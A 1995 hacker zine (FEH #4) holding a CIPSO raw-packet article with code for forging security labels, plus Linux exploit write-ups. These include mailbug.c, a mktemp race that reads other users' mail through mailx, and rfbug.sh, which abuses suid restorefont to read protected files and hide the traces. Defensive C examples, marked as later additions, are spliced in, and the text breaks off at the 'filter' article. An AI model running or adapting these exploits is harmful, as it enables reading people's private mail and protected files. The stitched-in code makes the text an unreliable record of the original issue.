FEH
Fashionably Elegant Hackers

Issue #4
December 26th, 1995
Editor: ReDragon

Official FEH Distribution Sites:
    ftp.fc.net      /pub/defcon/FEH
    ftp.2600.com    /pub/publications/feh

No More Greetz (You already know if yer eleet)

FEH #4
The Saga Continues

By all accounts, this is our first issue actually delivered on time, and what is easily the best one yet. Previous issues I wondered if there was really a place for FEH, and if I would ever put out another issue. Well, there is no more wondering, the answer is quite clear. Yes. What made it so clear in my mind is that this really IS the best voice of hackers out there. The yardstick by which many zines are judged is phrack. This isn't phrack. And I don't want it to be. Erik Bloodaxe, despite all the best intentions on his part, has run phrack into the ground, and it is time to lay it to rest, and to let the hackers move on. And so, where will you find the hearts of real hackers, what puts a smile on the face of the real hackers, where the pulse of the hacker community lies. It is here, it is FEH.

-ReDragon

<---------------------------------------------------------------------------->

Table of Contents

General Stuff:
    Intro
    Table of Contents
    /var/spool/mail/feh

Technical Articles:
    A Guide to CIPSO by Mythrandir
    Linux 'mail-x' Security Holes by FEH Staff
    Linux 'restorefont' Security Holes by FEH Staff
    Linux 'filter' Security Holes by FEH Staff
    IRC DCC Protocol Security Holes by FEH Staff
    Example Packet Construction Code by SnoNinja

Serious Articles:
    Breakfast with the Secret Service by Kamakize
    Some Thoughts on Hacking by Mythrandir
    Gray Areas: Who's on your side?
        by FEH Staff

Entertaining Articles:
    #hack Quotes by SnoNinja
    The Word List by Allen 3. Smith
    Macs vs. PCs by nicotine
    Haxoring an ATM Machine by shadow tao
    Department Store Paging by Tele Monster
    The Tales of Oof by t3
    The Elite Speak Filter by SnoNinja
    DefCon Reviews and Other Thoughts by Zeed

<---------------------------------------------------------------------------->

/var/spool/mail/feh

To: All XXXXX Bell Employees

The Corporate Information Security organization would like to take this opportunity to remind everyone that the Holiday season is when computer hackers usually take opportunities to attempt to `break into' computer systems. During this time, employees take vacations and fewer people are present in buildings to watch computer systems which allow hackers more time to attempt their tricks.

We would ask that each employee who is responsible for a computer system (yes, this includes that personal computer on your desktop, as well as those multi-user systems) to take precautions to insure no unauthorized person has the ability to access the computer system and the information on the system.

For employees with a personal computer:
  - if possible, turn it off and use the key to lock the system.
  - make certain start-up passwords are active (e.g., LOCKIT, XLOCK).
  - put software and data diskettes in a secure (locked) location.
  - turn off any modem attached to the PC.
  - perform a routine backup.

For system administrators with mid-range computers:
  - change the `root' password at the console.
  - insure audit logs are working properly.
  - take a system backup.
  - for those systems with SysGuard installed, insure detective tools are working as expected.
  - upon return from holiday, review the audit logs for unsuccessful login attempts, usage of `root' userid, and any other suspicious activity.

For all employees:
  - remember, hackers try to use social engineering to convince you to give them information they shouldn't have.
  - upon return from holiday, check the `last login' message for each system to make certain it is the last time you accessed it.

This advisory is not meant to be an answer for every possible security precaution, but a reminder that securing company resources is the responsibility of every employee and should be treated as a part of each person's job.

Contact the Computer Security Administration Group at (xxx) xxx-xxxx with questions or for assistance.

---

"Nation-wide callerid went into effect on December first. As you are aware, FCC rules calling for nation-wide delivery of calling party number information went into effect. For some unexplained reason, Bell South test calls indicate that long distance carriers are not passing calling party number information. Bell South is in the process of contacting each carrier to ask for explanations and corrective actions. Until we have more information, there seems to be no point in referring the complaining customers to the carriers. The following verbiage should be used to state our position on this matter to complaining customers: 'Bell South network is fully compliant with the FCC order and will deliver the calling party number both to and from long distance carriers. We are working with carriers in those instances where the calling party number is not being delivered to identify problems and to ensure full compliance with the FCC order.'"

<---------------------------------------------------------------------------->

A Guide to the Common Internet Protocol Security Option
by Mythrandir (mythrndr@infonexus.com)

Some of you may have noticed that not all networks or operating systems respond to the reception of common IP packets anymore. In the struggle to maintain a secure network, recent innovations have been made in the area of trusted systems. Trusted systems can maintain and ensure that access to different classifications of data is properly restricted.
One method of maintaining this access control over a network is the common internet protocol security option (CIPSO). CIPSO allows hosts to communicate data in a generic manner so that its security levels and methods of handling can be understood by other machines. Hosts with different internal implementations of a trusted environment can still interact over the network and maintain their levels of security via CIPSO.

CIPSO is implemented by creating a new IP option (RFC 791). This option will allow both the kernel and the user (dependent on implementation) to add the option and thus specify the security level of a packet.

The basic format of a CIPSO option in an IP packet is as follows:

+-------------------------------------------------------------------------+
| OOOOOOOO | LLLLLLLL | DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD | TTTTTTTT...    |
+-------------------------------------------------------------------------+
  Option     Length     Domain of interpretation           Tag Information
  Number
  1 Byte     1 Byte     4 Bytes (Long)                     >= 4 Bytes

The option number is a one octet number. This should be 134 (decimal).

The length field specifies the length in bytes of the entire cipso option. This includes the header information (option, length, doi) as well as the tag information. This number cannot exceed 40 due to ip header length restrictions.

The domain of interpretation is a 4 octet number. This number specifies which type of security interpretation should be used. A host will check if it understands this number before it accepts a packet.

+-------------------------------------------------------------------------+
| tttttttt | llllllll | iiiiiiiiiiiiiiiiiiii....                          |
+-------------------------------------------------------------------------+
  Tag Type   Length     Tag fields
  1 octet    1 octet    variable

Tag type is a one octet number which specifies the format of the tag. The numbers 1 - 127 are reserved for standard tag definitions. 128-255 can be assigned by a DOI authority. This is simply a local network definition.
Length is a one octet number which specifies the length of the tag. This includes the tag type, length field, and the tag fields. This number cannot exceed 34, again for reasons due to the ip header length restriction of 60 bytes.

A standard tag type (very common):

Tag Type 1
+-------------------------------------------------------------------------+
| AAAAAAAA | SSSSSSSS | BBBBBBBBBBBBBBBBBBBBB.......                      |
+-------------------------------------------------------------------------+
  Alignment  Sensitivity  Bit map of categories
  1 octet    1 octet      variable

The alignment field is a 1 octet number. It is always set to zero. Its purpose is to simply align the bit map along an even boundary.

The sensitivity field is a 1 octet number which specifies the sensitivity level of the data. This could represent classified, secret, top secret, etc.

The bit map is a variable length field which can be from 0 to 30 bytes long. This is used to contain more specific sensitivity information on a segment of data. This is implementation specific.

The packet level implementation is very straightforward, and can be used in a wide variety of ways to control the data contained in the packets. The first is to only allow certain levels of sensitivity to pass through specific interfaces. In other words, you can configure it to handle multiple interfaces and pass top secret data through one interface and unclassified data through a different network interface. Or you could make a card allow unclassified data through, and reject passing of any classified data into an unclassified network. This allows filtering based on the sensitivity of data. The important point to note here is that filtering takes place at the kernel level, NOT the user level.

Also, CIPSO can be used so that when a host passes a piece of data across the network, the other host will assign the correct level of security to a data stream. The host can then assure that only authorized users can access the data that they are cleared for.
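An added example, not code from the article or its author: a C routine that validates a received CIPSO option against the layout and limits described above, then applies a per-interface sensitivity range. It parses by byte offset because the wire format carries no padding; reading the DOI in network byte order, handling only tag type 1, and the names cipso_parse and cipso_interface_permits are assumptions of this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CIPSO_OPTION       134  /* option number given in the article */
#define CIPSO_MAX_LEN       40  /* whole option, bounded by the IP header */
#define CIPSO_HDR_LEN        6  /* option + length + 4-octet DOI, no padding */
#define CIPSO_TAG_MAX_LEN   34
#define CIPSO_TAG1_HDR_LEN   4  /* type + length + alignment + sensitivity */
#define CIPSO_BITMAP_MAX    30

enum cipso_status {
    CIPSO_OK = 0,
    CIPSO_ERR_TRUNCATED,   /* fewer bytes available than the option claims */
    CIPSO_ERR_OPTION,      /* not option 134 */
    CIPSO_ERR_LENGTH,      /* option length outside 10..40 */
    CIPSO_ERR_DOI,         /* DOI this host does not understand */
    CIPSO_ERR_TAG_TYPE,    /* only tag type 1 is handled here */
    CIPSO_ERR_TAG_LENGTH,  /* tag length outside 4..34 or past the option */
    CIPSO_ERR_ALIGNMENT    /* alignment octet must be zero */
};

struct cipso_label {
    uint32_t doi;
    uint8_t  sensitivity;
    size_t   bitmap_len;
    uint8_t  bitmap[CIPSO_BITMAP_MAX];
};

/* Constructed sample (not captured traffic): DOI 0x12345678, one type 1
 * tag with sensitivity 1 and two bitmap octets. */
static const uint8_t SAMPLE_OPTION[12] = {
    134, 12, 0x12, 0x34, 0x56, 0x78,   /* option, length, DOI */
    1, 6, 0, 1, 0xC0, 0x00             /* type, length, align, sens, bitmap */
};

/* Validate one CIPSO option of up to `avail` bytes and copy out its label.
 * local_doi is the DOI this host is configured for (assumption: one DOI). */
enum cipso_status cipso_parse(const uint8_t *opt, size_t avail,
                              uint32_t local_doi, struct cipso_label *out)
{
    size_t optlen, taglen;
    const uint8_t *tag;

    if (avail < CIPSO_HDR_LEN)
        return CIPSO_ERR_TRUNCATED;
    if (opt[0] != CIPSO_OPTION)
        return CIPSO_ERR_OPTION;
    optlen = opt[1];
    if (optlen < CIPSO_HDR_LEN + CIPSO_TAG1_HDR_LEN || optlen > CIPSO_MAX_LEN)
        return CIPSO_ERR_LENGTH;
    if (optlen > avail)
        return CIPSO_ERR_TRUNCATED;

    /* DOI is read most significant octet first (assumed network order). */
    out->doi = ((uint32_t)opt[2] << 24) | ((uint32_t)opt[3] << 16) |
               ((uint32_t)opt[4] << 8)  |  (uint32_t)opt[5];
    if (out->doi != local_doi)
        return CIPSO_ERR_DOI;

    tag = opt + CIPSO_HDR_LEN;
    if (tag[0] != 1)
        return CIPSO_ERR_TAG_TYPE;
    taglen = tag[1];
    if (taglen < CIPSO_TAG1_HDR_LEN || taglen > CIPSO_TAG_MAX_LEN ||
        taglen > optlen - CIPSO_HDR_LEN)
        return CIPSO_ERR_TAG_LENGTH;
    if (tag[2] != 0)
        return CIPSO_ERR_ALIGNMENT;

    out->sensitivity = tag[3];
    out->bitmap_len = taglen - CIPSO_TAG1_HDR_LEN;
    memcpy(out->bitmap, tag + CIPSO_TAG1_HDR_LEN, out->bitmap_len);
    return CIPSO_OK;
}

/* Per-interface rule: pass only labels whose sensitivity is in [lo, hi]. */
int cipso_interface_permits(const struct cipso_label *l, uint8_t lo, uint8_t hi)
{
    return l->sensitivity >= lo && l->sensitivity <= hi;
}

int main(void)
{
    struct cipso_label l;
    enum cipso_status st = cipso_parse(SAMPLE_OPTION, sizeof SAMPLE_OPTION,
                                       0x12345678u, &l);

    printf("status=%d\n", (int)st);
    if (st == CIPSO_OK)
        printf("doi=0x%08lx sensitivity=%u bitmap_octets=%lu permit(0..1)=%d\n",
               (unsigned long)l.doi, (unsigned)l.sensitivity,
               (unsigned long)l.bitmap_len, cipso_interface_permits(&l, 0, 1));
    return st == CIPSO_OK ? 0 : 1;
}
```

Passing these checks only shows that the option is well formed. The label is whatever the sender wrote, so a filter like this belongs on interfaces where untrusted hosts cannot inject raw packets.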
And now that you've found it, what do you do?

Well first off you should sit back and watch the network. Try and determine which machines allow what types of sensitivities. This is important so you will know what types you can send to specific machines. It is also important to note the tags that are sent with the classifications so that they are placed within the packets.

In order to get at sensitive data you will probably have to gain access to send raw packets to the local network. At this point you will have to generate raw ip packets which contain the CIPSO option in the header. This could be incorporated in a telnet client. This will allow you to connect to the other machines on the network assuming that you use the correct classification and tag fields.

Now for the Code...

The first program will allow you to create an ECHO REQUEST ICMP packet with a CIPSO option inside of it. This code is meant to be a base to write something more interesting with. There are two files, cipso.h and cipso_ping.c. Just type

    gcc -o cping cipso_ping.c

and run as root and then you are set. This code was written on a linux box, but should be fairly portable to other machines. Also, if you want to spoof your source address then you will have to use the IP_HDRINCL socket option, which requires you to patch the raw.c file if you are using a linux kernel.

Finally, for your listening pleasure, I've left a little snippet of code that will listen for ICMP packets. It will simply print out the hex data of any ICMP packets it receives.

    gcc -o ilisten icmp_listen.c

and go. This is also a great piece of code to use as a base for something more interesting.

Best of Luck!
Mythrandir

Ways to Improve this Code:
  - Fix ilisten so the complete packet information is printed out. Print out the entire ip header, the ip option, the icmp header and the data, all in a nice neat form.
  - Be Elite! Use your Own Code!
--------- cipso.h ------ cut here ------
/*
 * CIPSO structures
 * By, Mythrandir
 */
struct cipso_opt {
    u_char option_num;   /* Option number - should be 134 */
    u_char length;       /* length - cannot exceed 40 */
    u_long doi;          /* Domain of Interpretation - 4 bytes, a u_long */
    u_char tag_data[1];  /* Tag data pointer */
};

struct cipso_tag_type1 {
    u_char type;         /* Will be set to 1 */
    u_char length;       /* length - cannot exceed 34 */
    u_char alignment;    /* Alignment octet - always 0 */
    u_char sensitivity;  /* sensitivity label */
    u_char bitmap[1];    /* tag fields */
};
------ end of cipso.h ----- cut here ------

------ cipso_ping.c ------ cut here -------
/*
 * CIPSO Ping
 * This program demonstrates a simple method of creating a
 * cipso echo request packet.  This is meant to be a base to write
 * other far more useful programs such as a cipso telnet client
 * or whatnot.
 * Remember, you may need to modify the sensitivity and the
 * bit map in order to get it to work correctly with a machine.
 * 1995 - Mythrandir
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include "cipso.h"

#define DATA "FEH Greetz your system."
#define DATA_SIZE sizeof(DATA)
#define LOCAL_HOST "127.0.0.1"
#define DOI 0x12345678
#define TAGBITMAP "123456789012345678901234567890"
#define BITMAPSIZE 30
#define SENSITIVITY 1

/*
 * Data alignment numbers
 */
#define IP_START 0
#define CIPSO_START 20
#define ICMP_START 64
#define DATA_START 72

#define MAXHOSTNAMELEN 64
#define MAXPACKET 4096

struct sockaddr_in whereto;

/* Standard Internet checksum over len bytes starting at addr */
unsigned short in_cksum(unsigned short * addr, int len)
{
    register int nleft = len;
    register unsigned short *w = addr;
    register unsigned short answer ;
    unsigned short odd_byte = 0;
    register int sum = 0;

    while(nleft > 1) {
        sum += *w++;
        nleft -= 2;
    }

    if(nleft == 1) {
        *(unsigned char *)(&odd_byte) = *(unsigned char *) w;
        sum += odd_byte;
    }

    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    answer = ~sum;
    return answer;
}

int main(int argc, char *argv[])
{
    char **av = argv;
    unsigned char packet[MAXPACKET];
    int options;
    int ntransmitted = 0;
    int ident = getpid() &0xFFFF;
    int sock;
    struct sockaddr_in *to = (struct sockaddr_in *) &whereto;
    struct sockaddr_in from;
    struct hostent *hp;
    char *hostname;
    char hnamebuf[MAXHOSTNAMELEN];

    /* variables for doing a ping packet */
    unsigned char outpack[MAXPACKET];
    struct iphdr *ip = (struct iphdr *) &outpack[IP_START];
    struct cipso_opt *cipso = (struct cipso_opt *) &outpack[CIPSO_START];
    struct cipso_tag_type1 *tag1 = (struct cipso_tag_type1 *) cipso->tag_data;
    struct icmphdr *icp = (struct icmphdr *) &outpack[ICMP_START];
    int i;
    unsigned char *datap = &outpack[DATA_START];

    /*
     * force user to enter host
     */
    if(argc < 2) {
        printf("%s: \n", argv[0]);
        exit(1);
    }

    /*
     * Initialize everything
     */
    bzero( (char*) &whereto, sizeof(struct sockaddr) );
    to->sin_family = AF_INET;
    /* inet_addr() already returns the address in network byte order */
    to->sin_addr.s_addr = inet_addr(av[1]);
    if(to->sin_addr.s_addr != -1) {
        strcpy(hnamebuf, av[1]);
        hostname = hnamebuf;
    } else {
        hp = gethostbyname(av[1]);
        if(hp) {
            to->sin_family = hp->h_addrtype;
            bcopy(hp->h_addr, (caddr_t)&to->sin_addr, hp->h_length);
            hostname = hp->h_name;
        } else {
            fprintf(stderr, "%s: unknown host %s\n", argv[0], av[1]);
            exit(1);
        }
    }

    /*
     * Open a Socket
     */
    sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if(sock < 0) {
        printf("Error: Cannot Open RAW IP socket\n");
        exit(1);
    }
    printf("Opened RAW Socket\n");

    /*
     * Set up IP Header
     */
    ip->ihl = 15;        /* set to 15 to include option in header */
    ip->version = 4;
    ip->tos = 0;
    ip->tot_len = DATA_START + DATA_SIZE;
    ip->id = 0;
    ip->frag_off = 0;
    ip->ttl = 255;
    ip->protocol = 1;    /* ICMP Protocol */
    ip->check = 0;
    ip->saddr = inet_addr(LOCAL_HOST);  /* Thanks to linux this means nothing. YET */
    ip->daddr = inet_addr(av[1]);

    /*
     * Set up Cipso Header
     */
    cipso->option_num = 134;
    cipso->length = 40;
    cipso->doi = DOI;

    /*
     * Set up cipso tag data
     */
    tag1->type = 1;
    tag1->length = 34;
    tag1->alignment = 0;
    tag1->sensitivity = SENSITIVITY;
    strncpy((char *) tag1->bitmap, TAGBITMAP, BITMAPSIZE);

    /*
     * Set up ICMP Header
     */
    icp->type = 8;
    icp->code = 0;
    icp->checksum = 0;
    icp->un.echo.sequence = ntransmitted++;
    icp->un.echo.id = ident;

    /*
     * Compute ICMP checksum
     */
    icp->checksum = in_cksum((unsigned short *) icp, 8 + DATA_SIZE);

    /*
     * Compute IP checksum (covers the IP header only)
     */
    ip->check = in_cksum((unsigned short *) ip, ip->ihl * 4);

    /*
     * sendto(s, msg, len, flags, to, tolen)
     */
    i = sendto(sock, outpack, DATA_START + DATA_SIZE, 0,
               (struct sockaddr *) &whereto, sizeof(struct sockaddr));
    close(sock);
    exit(0);
}
--------- end of cipso_ping.c ------- cut here -------

------- icmp_listen.c ------- cut here -------
/*
 * Ping watch - A very very rough ICMP packet watcher
 * Simply displays hex values of packet
 * by, Mythrandir
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

main()
{
    int l, i, j;
    int sock, length;
    struct sockaddr_in name;
    char buf[1024];

    sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
    if (sock < 0) {
        printf("Cannot open Raw ICMP Socket.\n");
        exit(1);
    }

    name.sin_family = AF_INET;
    name.sin_addr.s_addr = INADDR_ANY;
    name.sin_port = 0;
    if (bind(sock, (struct sockaddr *) &name, sizeof name ) < 0) {
        printf("Error binding ICMP socket");
        exit(1);
    }

    length = sizeof(name);
    if (getsockname(sock,
                    (struct sockaddr *) &name, &length) < 0) {
        printf("Error: Can't get socket name\n");
        exit(1);
    }
    printf("Socket port #%d\n", ntohs(name.sin_port));

    for( ; ; ) {
        if ((l = read(sock, buf, 1024)) < 0)
            printf("Error receiving ICMP packet\n");

        /*
         * Print out IP information
         */
        printf("Got ICMP Packet From: %d.%d.%d.%d\n",
               buf[12] & 0xff, buf[13] & 0xff, buf[14] & 0xff, buf[15] & 0xff);
        printf("Got ICMP Packet To: %d.%d.%d.%d\n",
               buf[16] & 0xff, buf[17] & 0xff, buf[18] & 0xff, buf[19] & 0xff);

        /*
         * Print IP Data
         */
        for(i = 0; i < (l - 4); i += 16) {
            for(j = 0; j < 16; j++)
                if((buf[i + j] & 0xff) < 16)
                    printf("0%x ", buf[i + j] & 0xff);
                else
                    printf("%x ", buf[i + j] & 0xff);
            printf(" ");
            for(j = 0; j < 16; j++)
                if((buf[i + j] < 33) || (buf[i + j] > 126))
                    printf(".");
                else
                    printf("%c", buf[i + j]);
            printf("\n");
        }
        fflush(stdout);
    }
    close(sock);
    exit(0);
}
---------- end of icmp_listen.c ------- cut here --------

<---------------------------------------------------------------------------->

Linux 'mailx' Security Holes
by FEH Staff

There is a problem prevalent in the way many programs implement their usage of mktemp() in order to create temporary files in /tmp, allowing users on a machine to read and write to the contents of temporary files created.

The basic problem is that there is a race condition that exists between the point at which a program calls mktemp() and the point at which the pathname returned by mktemp() is actually created. For some programs, the file creation is immediately or almost immediately following the mktemp(), resulting in an extremely small window of opportunity, and as a result making it very difficult to exploit. However, there are other programs that do not immediately open the file, and in these cases it is only a matter of getting the timing right in order to exploit the hole.
To exploit this hole, simply create the file that mktemp() returns as a valid temporary filename after mktemp() has been called, but before the file has been opened, allowing the user running the program permissions to read and write from that temporary file. The program will then succeed in an fopen, and will write to the file, oblivious to the fact that it didn't actually create the file, and that others can also read and write from the file.

Note that most programs will immediately unlink() a temporary file, but that does not delete it until after it is closed. Closing a file results in the contents of it being flushed, and so by using a 'tail -f' or a similar procedure, you can capture the contents of the file before it is removed from the filesystem.

The filename returned by mktemp() is easily determined for most unix platforms, allowing this bug to be exploited. For the linux libc, the leftmost X in the template is replaced with a character starting at 'a', and then incremented through 'a'-'z', 'A'-'Z', and '0'-'9' (if that file already exists), and the rest of the X's are replaced with the process id (0 padded). Other operating systems use a variation of this technique; experimentation easily reveals the algorithm.

The generic procedure used to formulate an exploit for a particular program with this bug is as follows:

1. detect the execution of the program.
2. determine the temporary filename that mktemp() will return when called by the program.
3. determine the point at which mktemp() is called by the program, and immediately following that point, create the file, with rw permissions for the user who is running the program.
4. read the contents of the temporary file, using a 'tail -f' or your own routines.
5. if the sticky bit is set on /tmp, clean up your mess by rm'ing the temp file you created, since the unlink() called by the actual program will fail if you are the owner.
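The defensive counterpart to the steps above, as an added example that is not part of the original article: the race exists only because the name is chosen in one step and opened in another with no check for what is already there. The C code below plants a file in a private scratch directory (a constructed stand-in for another user getting there first) and compares a plain open, an O_EXCL open, and mkstemp(); the function names and paths are this example's own.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the article describes: the name was picked earlier and the
 * file is opened later with no check for something already being there. */
int open_temp_unsafe(const char *path)
{
    return open(path, O_RDWR | O_CREAT, 0600);
}

/* Create-or-fail: EEXIST if a file or symlink already has the name. */
int open_temp_exclusive(const char *path)
{
    return open(path, O_RDWR | O_CREAT | O_EXCL, 0600);
}

/* 1 if fd is a regular file we own with no group/other access. */
int temp_is_private(int fd)
{
    struct stat st;

    if (fstat(fd, &st) != 0)
        return 0;
    return S_ISREG(st.st_mode) && st.st_uid == geteuid() &&
           (st.st_mode & (S_IRWXG | S_IRWXO)) == 0;
}

struct race_result {
    int unsafe_opened;    /* plain open succeeded on the planted file */
    int unsafe_private;   /* was what it opened private? */
    int excl_errno;       /* errno from the O_EXCL attempt */
    int mkstemp_private;  /* was the mkstemp() file private? */
};

int run_race_demo(struct race_result *r)
{
    char dir[] = "/tmp/mktemp-demo-XXXXXX";
    char planted[64], fresh[64];
    mode_t old;
    int fd;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(planted, sizeof planted, "%s/RsPLANTED", dir);
    snprintf(fresh, sizeof fresh, "%s/RsXXXXXX", dir);

    /* Constructed stand-in for another local user getting there first:
     * the name already exists, readable and writable by everyone. */
    old = umask(0);
    fd = open(planted, O_WRONLY | O_CREAT | O_EXCL, 0666);
    umask(old);
    if (fd < 0)
        return -1;
    close(fd);

    fd = open_temp_unsafe(planted);
    r->unsafe_opened = fd >= 0;
    r->unsafe_private = fd >= 0 && temp_is_private(fd);
    if (fd >= 0)
        close(fd);

    errno = 0;
    fd = open_temp_exclusive(planted);
    r->excl_errno = fd < 0 ? errno : 0;
    if (fd >= 0)
        close(fd);

    /* mkstemp() picks the name and creates the file (mode 0600) in one step. */
    fd = mkstemp(fresh);
    r->mkstemp_private = fd >= 0 && temp_is_private(fd);
    if (fd >= 0) {
        close(fd);
        unlink(fresh);
    }

    unlink(planted);
    rmdir(dir);
    return 0;
}

int main(void)
{
    struct race_result r;

    if (run_race_demo(&r) != 0)
        return 1;
    printf("plain open:  opened=%d private=%d\n", r.unsafe_opened, r.unsafe_private);
    printf("O_EXCL open: %s\n", r.excl_errno == EEXIST ? "refused (EEXIST)" : "unexpected");
    printf("mkstemp():   private=%d\n", r.mkstemp_private);
    return 0;
}
```

A program that must keep a name it generated earlier can still call fstat() on the descriptor it ends up with, as temp_is_private() does, and refuse to write if the file is not its own.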
Linux's /bin/mail, as included in Slackware 3.0 (mailx 5.5), suffers from this mktemp() problem in all temporary files it creates. It uses 5 temporary files with filenames generated during the program's initialization in a tinit() function, and then uses them as it becomes necessary during the program's execution. The race condition begins in this tinit() function. The temporary files that can be exploited are as follows:

/tmp/ReXXXXXX
    Used when a user selects 'e' from the mailx command prompt, to edit mail. The message the user has selected to edit is copied to the temporary file at this point, and then the editor is invoked on that temp file. The race condition ends when the user has selected 'e', and allows the message being edited to be read.

/tmp/RsXXXXXX
    Used when a user sends mail, usually from the command line, such as: 'mail dave'. The race condition ends when EOF is received from stdin, and the message is about to be sent, and allows the outgoing mail to be read.

/tmp/RqXXXXXX
    Used when mail arrives into the mail spool while mail is currently running. The race condition ends when the program is preparing to shutdown, and allows the new contents of the mail spool to be read.

/tmp/RmXXXXXX
    Used to prepend a message to the user's mbox file. Prepending requires the entire mbox contents to be read to the temporary file and then appended to the new message(s) being added to the file. This is disabled by default in Slackware 3.0 in the /etc/mail.rc by the use of the set append option. For this to be useful, that option needs to be removed from /etc/mail.rc, or an unset append needs to be added to the user executing mail's .mailrc file. The race condition ends when the program is preparing to shutdown.

/tmp/RxXXXXXX
    Used to read messages from the user's mail spool. The race condition ends during the program's startup, when the mail spool is read, and allows any new mail in the user's spool to be read.
    Because there is no user input between tinit() and this point, it is the only race condition that isn't completely trivial to exploit.

The exploit that follows demonstrates the flaws in all but the final temporary file. To use, wait for a mail process to execute, then call the mailbug program with the process id as an argument, and finally execute a tail -f /tmp/R*, and let it run until the mail program has terminated execution.

As an aside, there are a number of programs that are vulnerable to a directed denial of service attack preventing people from using them by creation of the 62 temporary files that are attempted to be used by mktemp(), resulting in the failure of the program to run. By continuous running of a program watching for these vulnerable programs to start, they can be prevented from ever successfully executing (one such example of this is in.pop3d, which would allow a denial of service attack against a specific user from receiving mail through pop).

Program: mailx-5.5 (/bin/mail)
Affected Operating Systems: linux - Slackware 3.0, others with mailx-5.5
Requirements: account on system, user using /bin/mail
Temporary Patch: chmod o-x /usr/bin/Mail (ie: use something else)
Security Compromise: any user with an account can read incoming, edited, or outgoing mail if the mail is processed by mailx.
Synopsis: The predictability of mktemp() is exploited to create the temporary files after the filenames have been determined but before they are actually created, allowing the mail being dumped to those temporary files to be read by the creator of the files.

mailbug.c:

/* This program creates temporary files used by mailx (/bin/mail under
   Slackware 3.0), which can then be read by the program.  This will
   exploit 4 of the 5 temporary files, the final temporary file is a
   tighter race condition, and is not handled by this code.
   Following execution of this program with the process id of mail that
   is running, execute 'tail -f /tmp/R*', redirecting to a file if
   desired, and allow it to run until the mail process has exited.  This
   can be easily handled in a shell script, but is not included since it
   is not needed to sufficiently demonstrate the security flaw.
*/

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

void exploit_mktemp(char *dest, char *prepend, char *pid)
{
  int i;

  strcpy(dest,prepend);
  for(i=strlen(pid);i<6;i++)
    strcat(dest,"0");
  strcat(dest,pid);
  dest[strlen(prepend)] = 'a';
}

int main(int argc, char **argv)
{
  char tmpf[5][80];  /* hold filename */

  umask(0);
  if(argc<2) {
    printf("mailbug racer\nSyntax: %s process-id\n",argv[0]);
    return -1;
  }

  /* get mktemp filenames */
  exploit_mktemp(tmpf[0],"/tmp/Re",argv[1]);
  exploit_mktemp(tmpf[1],"/tmp/Rs",argv[1]);
  exploit_mktemp(tmpf[2],"/tmp/Rq",argv[1]);
  exploit_mktemp(tmpf[3],"/tmp/Rm",argv[1]);

  /* create temporary files */
  creat(tmpf[0],S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);
  creat(tmpf[1],S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);
  creat(tmpf[2],S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);
  creat(tmpf[3],S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);
}

<---------------------------------------------------------------------------->

Linux 'restorefont' Security Holes
by FEH Staff

Linux's svgalib utilities, required to be suid root, have a problem in that they do not revoke suid permissions before reading a file. This is exploited in the restorefont utility, but similar bugs exist in other svgalib utilities.

The restorefont utility serves two functions. First, it will read a font from a file and write it to the console as the font. Second, it will read a font from the console and write it out to a file. Luckily, the specific bug in restorefont can only be exploited if someone is at the console, reducing its overall impact on the security of the system as a whole.
In writing the utilities, the authors are cognizant of the fact that when writing out the font, suid permissions must first be given up; it is in fact commented as such in the code. However, when reading in a font, the program is still running with full suid root permissions. This allows us to read in any file for the font that root could access (basically, anything).

The applicable code to read in the file is shown below:

#define FONT_SIZE 8192
unsigned char font[FONT_SIZE];

if (argv[1][1] == 'r') {
    FILE *f;
    f = fopen(argv[2], "rb");
    if (f == NULL) {
      error:
        perror("restorefont");
        exit(1);
    }
    if(1!=fread(font, FONT_SIZE, 1, f)) {
        if(errno)
            goto error;
        puts("restorefont: input file corrupted.");
        exit(1);
    }
    fclose(f);

We can see from this that the file to be read in has to be at least 8k, as if it is not, the program will produce an error and exit. If the file is at least 8k, the first 8k are read into the buffer, and the program proceeds to set whatever the contents of the file are to the font:

    vga_disabledriverreport();
    vga_setchipset(VGA);   /* avoid SVGA detection */
    vga_init();
    vga_setmode(G640x350x16);
    vga_puttextfont(font);
    vga_setmode(TEXT);

At this point, the console will now look quite unreadable if you are reading something other than a font from that file. But, the data that is put into the font is left untouched and is readable using the -w option of restorefont.

We then read the font back from video memory to a new file, and our job is complete, we have read the first 8k of a file we shouldn't have had access to. To prevent detection of having run this, we probably shouldn't leave an unreadable font on the screen, so we save and then restore the original font before reading from the file.
The complete exploit is shown below:

Program: restorefont, a svgalib utility
Affected Operating Systems: linux
Requirements: logged in at console
Security Compromise: user can read first 8k of any file of at least 8k in size on local filesystems
Synopsis: restorefont reads a font file while suid root, writing it to video memory as the current vga font; anyone at console can read the current font to a file, allowing you to use video memory as an 8k file buffer.

rfbug.sh:

#!/bin/sh
restorefont -w /tmp/deffont.tmp
restorefont -r $1
restorefont -w $2
restorefont -r /tmp/deffont.tmp
rm -f /tmp/deffont.tmp

<---------------------------------------------------------------------------->

Linux 'filter' Security Holes
by FEH Staff

